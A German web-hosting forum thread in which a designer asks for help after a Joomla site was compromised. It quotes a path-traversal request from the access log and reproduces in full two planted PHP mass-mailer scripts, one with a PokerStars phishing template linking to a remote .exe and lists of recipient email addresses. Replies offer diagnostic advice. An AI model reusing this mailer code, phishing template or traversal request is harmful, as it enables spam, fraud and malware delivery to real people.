erst Hackerangriff nun Spam Mails

nexnos · Jan 4, 2011

Hi allemann.

ich bin freier Designer und habe einen Kundenserver für Kunden-Webprojekte. Ein Kunde mit einer "Joomla"-Seite wünschte ein redesign und rekonzeption der Webseite, die ich vornahm.
Eine alte Erweiterung führte nun zu einem Hackerangriff (auszug aus log-Datei: )

Code:

188.165.220.76 - - [01/Jan/2011:04:50:30 +0100] "GET /?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 1390 "-" "libwww-perl/5.837"

Der hacker konnte eine poker.php einschleusen, sowie die index.php verändern.

PHP:

POKER.PHP:
<? ob_clean(); ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Brandon_DiCamillo - Rox.Crime</title>
<style type="text/css">
<!--
body {
	background-color: #000000;
}
body,td,th {
	color: #FFFFFF;
	font-family: Arial, Helvetica, sans-serif;
	font-size: 9px;
}
#form1 #emails {
	font-family: Verdana, Arial, Helvetica, sans-serif;
	font-size: 9px;
	color: #666666;
}
#form1 #Enviar {
	font-family: Verdana, Arial, Helvetica, sans-serif;
	font-size: 11px;
	color: #333333;
	background-color: #999999;
}
.uaA {
	font-family: Verdana, Arial, Helvetica, sans-serif;
	font-size: 9px;
}
#form1 #html {
	font-family: Verdana, Arial, Helvetica, sans-serif;
	font-size: 9px;
	color: #FF0000;
}
-->
</style>
</head>
<body>
<label>
<table width="370" border="0" align="center">
  <tr align="center" >
    <td width="370" height="437" align="center" bgcolor="#333333"><form action="" method="post" name="form1" class="uaA" id="form1">

      <label><img src="http://inboxhot.iespana.es/imageanti7.gif" /> </label>
      <center><table align="center" width="370" border="0">
        <tr align="center" > ++++++++ Brandon_DiCamillo ++++++++
          <td width="180" height="15" align="center" bgcolor="#666666"><label> Nome:</label></td>
          <td width="180" height="15" align="center" bgcolor="#666666">Remetente:</td>
        </tr>

        <tr align="center" >

          <td align="center" bgcolor="#666666">
			<input name="nome" type="text" class="uaA" id="nome" value="PokerStars" size="30" /></td>
          <td align="center" bgcolor="#666666">
			<input name="remetente" type="text" class="uaA" id="remetente" value="support@pokerstars.net" size="30" /></td>
        </tr>
        <tr align="center" >
          <td height="15" align="center" bgcolor="#666666"><label>Assunto:</label></td>

          <td height="15" align="center" bgcolor="#666666">Email de retorno: </td>

        </tr>
        <tr align="center" >

          <td height="16" align="center" bgcolor="#666666"><label>
            <input name="assunto" type="text" class="uaA" id="assunto" value="PokerStars te da $0,50!" size="36" />
          </label></td>
          <td height="16" align="center" bgcolor="#666666"><label>

            <input name="returpath" type="text" class="uaA" id="returpath" size="30" />
          </label></td>

        </tr>
      </table>
      <label><br />

      <br />
      <br />
      C&oacute;digos HTML <br />

	 <textarea name="html" cols="70" rows="15" id="html"> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<center>
<p align="center"><a href=""><img src="http://www.poker770-promo.com/home_files/poker-stars_banner_logo.JPG" width="679" height="78"></img></a>
  <br>
  </p>
<p align="center">A <strong>PokerStars.Com</strong> est&aacute; dando de fim de ano <strong>$0,50</strong> para voc&ecirc; iniciar sua BankRoll! Cadastre agora e insira o c&oacute;digo '<strong>NEWYEAR50</strong>' no campo referente ao c&oacute;digo no cadastro. Promo&ccedil;&atilde;o v&aacute;lida at&eacute; dia <strong>31/12/2010</strong>.</p>
<p align="center"><a href="http://beneditobentes.org/images/PokerStarsInstallPM.exe"><img src="http://www.psimg.com/img/rm/hp/poker-bonus.gif" alt="" width="188" height="63" /></a></p>
<p align="center">Bônus 100% de Primeiro Depósito
  
  Faça o primeiro de todos os seus depósitos em dinheiro real utilizando o código '<strong>STARS600</strong>', e o PokerStars lhe presenteará com um bônus de 100%, até $600 (veja a tabela em baixo para outras moedas). Você pode realizar até três depósitos qualificatórios em 90 dias (até o montante máximo do bônus) – a maneira perfeita de aproveitar completamente o bônus de 100%.</p>
<p align="center">Fa&ccedil;a j&aacute; o Download, cadastre-se e comece a jogar agora!</p>
<p align="center"><br>
<a href="http://beneditobentes.org/images/PokerStarsInstallPM.exe"><img src="http://www.flopturnriver.com/sam/download-pokerstars.png" width="186" height="186" /></a></p>
<p align="center"><img src="http://www.pokerstars.com/images/logo-cigital.gif" alt="Cigital" width="54" height="60" /> <span onclick="window.open('http://www.pokerstars.com/gamcare/certificate/','_self')"><img src="http://www.pokerstars.com/images/logo-gccertif2010.gif" alt="GamCare Certificate" width="79" height="52" /></span> <span onclick="window.open('http://www.gamcare.org.uk/')"><img src="http://www.pokerstars.com/images/logo-gamcare.gif" alt="GamCare" width="42" height="52" /></span> <span onclick="window.open('http://www.gov.im/gambling/')"><img src="http://www.pokerstars.com/images/logo-iomcrest.gif" alt="IOM Crest" width="61" height="60" /></span> <img src="http://www.pokerstars.com/images/logo-igc.gif" alt="Interactive Gaming Council" /> <span onclick="window.open('http://www.pokerstars.com/about/responsible-gaming/#over18','_self')"><img src="http://www.pokerstars.com/images/logo-18iom.gif" alt="Over 18 Only" width="32" height="60" /></span></p>
<div id="logos"></div>



</textarea>

      <br />
      <br />
      Lista de emails <br />

      </label>
      <table  align="center" width="200" border="0">
        <tr align="center" >

          <td><textarea name="emails" cols="50" rows="6" id="emails">thalesnn@hotmail.com
thalesnn@yahoo.com.br
thalesnn@gmail.com
brandon_dicamillo@live.it
libar@uol.com.br</textarea></td>

        </tr>
      </table>
      <label>      </label>
      <p>

        <input name="Enviar" type="submit" id="Enviar"value="Enviar" />
      </p>

    </form></td>
  </tr>

</table>

<?php
@ignore_user_abort(TRUE);
error_reporting(0);
@set_time_limit(0);
ini_set("memory_limit","-1");
// Pega os valores dos forms para as variáveis.
$enviar = $_POST['Enviar'];       // Pega o valor do botão Enviar caso ele seja pressionado.
$remetente = $_POST['remetente']; // Pega o email do remetente.
$nome = $_POST['nome'];           // Pega o nome do remetente.
$assunto = $_POST['assunto'];     // Pega o assunto.
$e_retorno = $_POST['returpath']; // Pega o email para retornar os erros (Return-Path)
$lista_emails = $_POST['emails']; // Pega a lsita de emails.
$lista_html = $_POST['html'];     // Pega os codigos html.
$emails_lista = explode("\n", $lista_emails); // Pegas os emails separados por quebra de linha "\n".
$numemails = count($emails_lista); // Pega a quantidade de emails da lista.
$mensagem = $lista_html;
$mensagem = stripslashes($mensagem); // Para ver mais http://www.supertrafego.com.br/php_stripslashes.asp
?>


<table align="center" width="847" border="0" align="center">
  <tr>
    <td width="841" align="center">

	<?php
	if ($enviar){
	echo ("Msg Enviada");
	}
	?>	</td>

  </tr>
</table>

<table align="center" width="294" border="0" align="center" cellspacing="0">
  <tr>
    <td width="292">
<?php
if ($enviar){

// Cabeçalhos
$headers  = "MIME-Version: 1.0\r\n";
$headers .= "Content-type: text/html; charset=iso-8859-1\r\n";
$headers .= "From: $nome <$remetente>\r\n";
$headers .= "Return-Path: <$e_retorno>\r\n";
$headers .= "Reply-To: <$remetente>\r\n";

echo ('Nome do Remetente: ' . $nome . '<br>');
echo ('E-mail do Remetente: ' . $remetente . '<br>');
echo ('Assunto: ' . $assunto . '<br>');
echo ('E-mail de retorno: ' . $e_retorno . '<br>');
echo ('Quantidade de email: ' . $numemails . '<br>');
?>

</td>
  </tr>
  <tr>

    <td>
<?php
// Sistema para enviar os emails
for($x=0; $x<$numemails; $x++){
$quanti++;
$email_go = $emails_lista[$x];
$mail = mail($email_go, $assunto, $mensagem, $headers);
if ($mail==1) {
$okenviado++;
echo('<font color="black">Enviando: ' . $quanti . '&nbsp;<b>' . $email_go .  '</b></font>' . '<font color=blue face=verdana size=1>Enviado.</font><br>');
} else {
$erroenviado++;
echo('<font color="black">Não enviado: ' . $quanti . '&nbsp;<b>' . $email_go .  '</b></font>' . '<font color=red face=verdana size=1> ERRO </font><br>');
sleep(1);}
}
echo('<font color="#0033FF" size="1" face="Verdana, Arial, Helvetica, sans-serif">............Envio finalizado............</font><br>');
echo ('Total de E-mals enviados com sucesso: ' . $okenviado . '<br>');
echo ('Total de E-mails não enviados: ' . $erroenviado . '<br>');
}
?>

</td>
  </tr>
</table>
</body>
</html>
<? die; ?>

Beides wurde relativ schnell erkannt und behoben (gelöscht&editiert).
Leider wurde übersehen, dass auch die License.php bearbeitet wurde.

PHP:

<body>
<label>
<table width="370" border="0" align="center">
  <tr align="center" >
  
  <td width="370" height="437" align="center" bgcolor="#333333">
  <form action="" method="post" name="form1" class="uaA" id="form1">
  
  <label><img src="http://inboxhot.iespana.es/imageanti7.gif" /> </label>
  <center>
  <table align="center" width="370" border="0">
    <tr align="center" >Ko0l Mailer ;]
      <td width="180" height="15" align="center" bgcolor="#666666"><label> Nome:</label></td>
      <td width="180" height="15" align="center" bgcolor="#666666">Remetente:</td>
    </tr>
    <tr align="center" >
      <td align="center" bgcolor="#666666"><input name="nome" type="text" class="uaA" id="nome" value="terra.cl" size="30" /></td>
      <td align="center" bgcolor="#666666"><input name="remetente" type="text" class="uaA" id="remetente" value="info@hi5.com" size="30" /></td>
    </tr>
    <tr align="center" >
      <td height="15" align="center" bgcolor="#666666"><label>Assunto:</label></td>
      <td height="15" align="center" bgcolor="#666666">Email de retorno: </td>
    </tr>
    <tr align="center" >
      <td height="16" align="center" bgcolor="#666666"><label>
        <input name="assunto" type="text" class="uaA" id="assunto" value="Video candente de Lady Gaga con una mujer!!!" size="36" />
      </label></td>
      <td height="16" align="center" bgcolor="#666666"><label>
        <input name="returpath" type="text" class="uaA" id="returpath" size="30" />
      </label></td>
    </tr>
  </table>
  <label>
  <br />
  <br />
  <br />
  C&oacute;digos HTML <br />
  <textarea name="html" cols="70" rows="15" id="html"></textarea>
<br />
<br />
Lista de emails <br />
</label>
<table  align="center" width="200" border="0">
  <tr align="center" >
    <td><textarea name="emails" cols="50" rows="6" id="emails">chris-ge@hotmail.com
titiriterosoy@gmail.com</textarea></td>
  </tr>
</table>
<label> </label>
<p>
  <input name="Enviar" type="submit" id="Enviar"value="Enviar" />
</p>
</form>
</td>
</tr>
</table>
<?php
@ignore_user_abort(TRUE);
error_reporting(0);
@set_time_limit(0);
ini_set("memory_limit","-1");
// Pega os valores dos forms para as variáveis.
$enviar = $_POST['Enviar'];       // Pega o valor do botão Enviar caso ele seja pressionado.
$remetente = $_POST['remetente']; // Pega o email do remetente.
$nome = $_POST['nome'];           // Pega o nome do remetente.
$assunto = $_POST['assunto'];     // Pega o assunto.
$e_retorno = $_POST['returpath']; // Pega o email para retornar os erros (Return-Path)
$lista_emails = $_POST['emails']; // Pega a lsita de emails.
$lista_html = $_POST['html'];     // Pega os codigos html.
$emails_lista = explode("\n", $lista_emails); // Pegas os emails separados por quebra de linha "\n".
$numemails = count($emails_lista); // Pega a quantidade de emails da lista.
$mensagem = $lista_html;
$mensagem = stripslashes($mensagem); // Para ver mais http://www.supertrafego.com.br/php_stripslashes.asp
?>


<table align="center" width="847" border="0" align="center">
  <tr>
    <td width="841" align="center">

	<?php
	if ($enviar){
	echo ("Msg Enviada");
	}
	?>	</td>
  </tr>
</table>
<table align="center" width="294" border="0" align="center" cellspacing="0">
  <tr>
    <td width="292">
<?php
if ($enviar){

// Cabeçalhos
$headers  = "MIME-Version: 1.0\r\n";
$headers .= "Content-type: text/html; charset=iso-8859-1\r\n";
$headers .= "From: $nome <$remetente>\r\n";
$headers .= "Return-Path: <$e_retorno>\r\n";
$headers .= "Reply-To: <$remetente>\r\n";

echo ('Nome do Remetente: ' . $nome . '<br>');
echo ('E-mail do Remetente: ' . $remetente . '<br>');
echo ('Assunto: ' . $assunto . '<br>');
echo ('E-mail de retorno: ' . $e_retorno . '<br>');
echo ('Quantidade de email: ' . $numemails . '<br>');
?>

</td>
  </tr>
  <tr>
    <td>
<?php
// Sistema para enviar os emails
for($x=0; $x<$numemails; $x++){
$quanti++;
$email_go = $emails_lista[$x];
$mail = mail($email_go, $assunto, $mensagem, $headers);
if ($mail==1) {
$okenviado++;
echo('<font color="black">Enviando: ' . $quanti . '&nbsp;<b>' . $email_go .  '</b></font>' . '<font color=blue face=verdana size=1>Enviado.</font><br>');
} else {
$erroenviado++;
echo('<font color="black">Não enviado: ' . $quanti . '&nbsp;<b>' . $email_go .  '</b></font>' . '<font color=red face=verdana size=1> ERRO </font><br>');
sleep(1);}
}
echo('<font color="#0033FF" size="1" face="Verdana, Arial, Helvetica, sans-serif">------------------------</font><br>');
echo ('Total de E-mals enviados com sucesso: ' . $okenviado . '<br>');
echo ('Total de E-mails não enviados: ' . $erroenviado . '<br>');
}
?>

</td>
  </tr>
</table>
</body>

Diese wurde auch gelöscht, bzw editiert.

Die Seite wurde gebackuped, alle Dateien nach schnadhaftem Code durchforstet, aber nichts weiter gefunden.
Allerdings wurden vor der Erkundung der license.php massenhaft spammails versandt.

Beispielhaft spammail:

Code:

--------- Weitergeleitete Nachricht ----------
From: "Content-filter at enif.cybercenter.cl" <postmaster@enif.cybercenter.cl>
To: <web11@mx.zzzzzzzzzzzzzzzzzz.de>
Date: Thu, 30 Dec 2010 14:51:20 -0300 (CLST)
Subject: Considered UNSOLICITED BULK EMAIL, apparently from you
A message from <web11@mx.zzzzzzzzzzzzzzzzzz.de>
to: fcbx@cybercenter.cl

was considered unsolicited bulk e-mail (UBE).

Our internal reference code for your message is 25395-11/UpZHsRITPADu

The message carried your return address, so it was either a genuine mail
from you, or a sender address was faked and your e-mail address abused
by third party, in which case we apologize for undesired notification.

We do try to minimize backscatter for more prominent cases of UBE and
for infected mail, but for less obvious cases some balance between
losing genuine mail and sending undesired backscatter is sought,
and there can be some collateral damage on either side.

First upstream SMTP client IP address: [209.85.215.zzz]
 mail-ey0-f180.google.com
According to a 'Received:' trace, the message apparently originated at:
 [194.126.239.zzzzzz],

Return-Path: <web11@mx.zzzzzzzzzzzzzzzzzz.de>
From: terra.cl <info@hi5.com>
Message-ID: <20101230175116.8B57EE0504A@mx.zzzzzzzzzzzzzzzzzz.de>
Subject: Video candente de Lady Gaga con una mujer!!!

Delivery of the email was stopped!

Original-Recipient: rfc822;fcbx@cybercenter.cl
Final-Recipient: rfc822;fcbx@cybercenter.cl
Action: failed
Status: 5.7.0
Diagnostic-Code: smtp; 554 5.7.0 Reject, id=25395-11 - SPAM
Last-Attempt-Date: Thu, 30 Dec 2010 14:51:20 -0300 (CLST)
Final-Log-ID: 25395-11/UpZHsRITPADu

Ich als Admin bekam und bekomme auch jetzt tage später immer noch massenhaft Fehlermails mit dem Inhalt (siehe Bild im Anhang) .

Die Log-Datei zeigt, dass ein bot zur gleichen uhrzeit auf dem server war.

Code:

208.115.111.250 - - [04/Jan/2011:04:47:45 +0100] "GET /de/medienportal/1645/3624-2010-.html HTTP/1.1" 404 10261 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.250 - - [04/Jan/2011:04:47:49 +0100] "GET /de/medienportal/1645/3810-2010-09-13.html HTTP/1.1" 404 10266 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"

Lange Rede, kurzer Sinn:
- was für bots sind das?
- warum verursachen die diese Fehlermeldungen?
- hat das noch direkt mit dem hackerangriff zu tun?
- Wie kann ich diese mails, bzw deren Ursache beheben?

Bin ratlos..

Danke (fürs lesen) und für hilfreiche Tipps

nexnos

Ben. · Jan 4, 2011

Der von dir genannte Bot ist harmlos. Er liest nur den Inhalt deiner Seiten für deren Index: http://www.dotnetdotcom.org/

Solange am Server (nicht nur PHP-Files) nichts verändert wurde, sollte es damit erledigt sein.

Lord Gurke · Jan 4, 2011

Alle von dir genannten Logfile-Auszüge lieferten den 404-Statuscode - bist du dir zumindest bei letzterem sicher, dass das die Ursache für die Mails ist?

Die Tatsache, dass ein Mailserver Spam annimmt und dann selbst Bounces generiert und zurückschickt lässt darauf schließen, dass dieser Mailserver gut zu tun haben muss. Vielleicht ist dessen Mailqueue so voll, dass die Mails einfach tatsächlich ein paar Tage in der Queue hingen.

Was sagt denn dein Mailserver-Log dazu? Werden da wirklich Mails an die angegebenen Empfänger verschickt?
Schaue dir auch mal die Mailqueue deines Systems an und leere die notfalls, wenn da noch tausende E-Mails festhängen.

kaspersky · Jan 5, 2011

Hallo,

Als kleine ZusatzInfo kann angemerkt werden: Die im PHP code enthaltene Mailaddresse "chris-ge@hotmail.com" wird momentan auch benutzt, um per 'Phishing'-seite gestohlene Accountdaten fuer BancoEstado (Chile) zu empfangen. Websuche nach dieser Addresse hat neben dieser Webseite hier auch eine Andere aufgetan, welche eine Server-Hintertuer enthaelt. Alles in allem also kriminelle Boesewichte, die da ihr Unwesen treiben.
Hoffe, es hilft.

Gruss aus Japan,
Michael

nexnos · Jan 6, 2011

Hallo,
danke für all eure Antworten.

Die herkunft der Mails an mich (wie im angehängten Screenshot im ersten Post) hat sich geklärt: das war eine Erweiterung des CMS die fehlende URLs meldet - also zumidnest da alles gut.

Massenmails werden nicht mehr versendet. Auch gut. Der Zugriff scheint durch die Sicherheitsmassnahmen verhindert zu werden. Puh.

Auf die Mailserverlogs habe ich leider keinen Zugriff. Wonach genau suchen die Phisher denn? Mailadressen? Oder Kundendaten? Oder Bankdaten?

@lord gurke: die 404 gabs erst NACH meinen änderungen (htaccess, etc), vorher war es die 200

danke für die schnelle hilfe und unterstützung

nexnos

erst Hackerangriff nun Spam Mails

nexnos

New Member

Attachments

Ben.

Registered User

Lord Gurke

Nur echt mit 32 Zähnen

kaspersky

New Member

nexnos

New Member

We value your privacy